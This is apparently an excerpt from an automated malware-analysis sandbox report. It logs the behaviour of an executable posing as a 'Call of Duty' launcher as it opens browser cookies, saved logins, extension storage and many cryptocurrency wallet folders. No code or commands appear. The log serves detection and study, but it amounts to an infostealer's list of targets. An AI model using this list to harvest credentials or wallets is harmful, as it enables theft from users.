              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
